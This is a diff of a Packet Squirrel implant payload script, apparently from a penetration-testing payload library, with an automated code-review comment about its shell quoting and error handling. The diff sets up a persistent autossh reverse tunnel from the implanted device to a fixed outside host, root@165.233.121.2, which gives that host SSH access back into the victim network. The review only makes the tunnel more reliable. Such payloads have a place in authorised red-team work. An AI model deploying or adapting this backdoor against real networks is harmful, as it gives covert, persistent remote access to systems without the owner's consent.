diff --git a/payloads/library/remote-access/SSH-remote-access/payload.sh b/payloads/library/remote-access/SSH-remote-access/payload.sh
index 76374ca..21372b8 100644
--- a/payloads/library/remote-access/SSH-remote-access/payload.sh
+++ b/payloads/library/remote-access/SSH-remote-access/payload.sh
@@ -9,56 +9,78 @@ # # LED State Descriptions # Magenta Solid - SSH connecting -# Blue - SSH connection successful +# Amber - SSH connection successful # -# C2 Server address, port and tunnel port -c2_server="192.168.1.145" -c2_tunnel_port=2222 -tunnel_user="username" -# no pass needed, headless mode required so RSA key file is used. -# generate in this directory with: 'ssh -t rsa -b 2048 -f id_rsa' - -# waiting for button press to start SSH connection. -#BUTTON -# - -# Magenta indicates SSH connection is launching and the server should have received the connection. +NETMODE NAT LED SETUP -echo -e "SETUP Phase\n" >> /root/payloads/switch3/debug.txt - -# we need an IP, so it'll have to be NAT, unless implanted inline. -NETMODE NAT -sleep 8 - -# debug -#echo -e "NAT configured.\n" $(ifconfig) >> /root/payloads/switch3/debug.txt - -# fix file permission problems -# chmod 600 id_rsa - -# -R indicates remote port forwarding which tunnels connections to localhost on server to client. -# Once complete, connect to remote SSH server and connect to the squirrel by connecting to localhost at -# the tunnel port specified on the server to reach the Squirrel. +# no pass needed, headless mode required so RSA key file is used. # -# default port is 22 -echo -e "Connecting to Server.\n" >> /root/payloads/switch3/debug.txt +# generate the key by running the following command in the /root/.ssh/ folder: +# 'ssh -t rsa -b 2048 -f id_rsa' +# +# To ensure that this works as intended, the user will have to connect to this host at least once +# with ssh -i /root/.ssh/id_rsa username@remote_server_ip to add this server to the squirrels list +# of trusted hosts. +# +# If this step fails, the payload will fail. + +autossh_host="root@165.233.121.2" +autossh_host_ip=$(echo $autossh_host | cut -d '@' -f2) +autossh_port="22" +autossh_remoteport="2222" +autossh_localport="22" + +if ! grep $autossh_host_ip /root/.ssh/known_hosts; then + echo "$autossh_host not in known_hosts, exiting..." 
>> /root/autossh.log + LED FAIL + exit 1 +fi + +# +# For the life of me I couldn't get SSH to work. The funny thing was it would +# run in the shell command, but not in the payload. The following solution +# implements a tool called autossh which ensures nothing funky happens to the +# connection. +# +# the following was ripped from dark_pyrro (the legend) via: +# https://codeberg.org/dark_pyrro/Packet-Squirrel-autossh/src/branch/main/payload.sh +# + +# waiting until eth1 acquires IP address +while ! ifconfig "eth1" | grep "inet addr"; do sleep 1; done echo -e "starting server.\n" >> /root/payloads/switch3/debug.txt -service sshd start -sleep 3 -ssh -R $c2_tunnel_port:127.0.0.1:22 -i /root/payloads/switch3/id_rsa $tunnel_user@$c2_server -# echo $ssh_out >> /root/payloads/switch3/debug.txt -# ssh_pid=$! +# starting sshd and waiting for process to start +/etc/init.d/sshd start +until netstat -tulpn | grep -qi "sshd" +do + sleep 1 +done -echo -e "Server Connected.\n" >> /root/payloads/switch3/debug.txt +# stopping autossh +/etc/init.d/autossh stop + +# +# Much like the SSH server, AutoSSH has a configuration file. This +# needs to be configured to support this connection as a daemon. +# +# Create a "fresh template" for the autossh configuration +# Starting with an empty autossh file in /etc/config +# isn't something that uci is very fond of +echo "config autossh" > /etc/config/autossh +echo " option ssh" >> /etc/config/autossh +echo " option enabled" >> /etc/config/autossh + + +# UCI configuration and commission +uci set autossh.@autossh[0].ssh="-i /root/.ssh/id_rsa -R "$autossh_remoteport":127.0.0.1:"$autossh_localport" "$autossh_host" -p "$autossh_port" -N -T" +uci set autossh.@autossh[0].enabled="1" +uci commit autossh LED ATTACK -# WARNING: Initial SSH connection must be manual, since c2_server may not be included in trusted_hosts file -# SSH will prompt for verification, and to add host to trusted hosts file. 
-#BUTTON 365d && { -# kill $ssh_pid -#} +# starting autossh +/etc/init.d/autossh start \ No newline at end of file
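Review bot: The known_hosts guard `if ! grep $autossh_host_ip /root/.ssh/known_hosts; then` passes the address unquoted and as a regex, so every `.` matches any character and an unrelated entry that merely shares the digits also satisfies the check, while the matching line is spilled to stdout; use `if ! grep -qF -- "$autossh_host_ip" /root/.ssh/known_hosts; then`, and a comment should say that the check still fails when known_hosts entries are hashed, since the plain address never appears in the file then. Nothing verifies that /root/.ssh/id_rsa exists before `uci commit autossh`, so a missing key leaves autossh retrying forever behind `LED ATTACK`; add `[ -r /root/.ssh/id_rsa ] || { LED FAIL; exit 1; }` next to the known_hosts check. The nested quotes in the `uci set autossh.@autossh[0].ssh=...` line only produce one argument because none of the variables contain whitespace; `"-i /root/.ssh/id_rsa -R ${autossh_remoteport}:127.0.0.1:${autossh_localport} ${autossh_host} -p ${autossh_port} -N -T"` is the same string without the quote juggling. The `while ! ifconfig "eth1" | grep "inet addr"` loop has no timeout and prints to stdout on success, so the payload hangs with no LED indication if eth1 never gets an address.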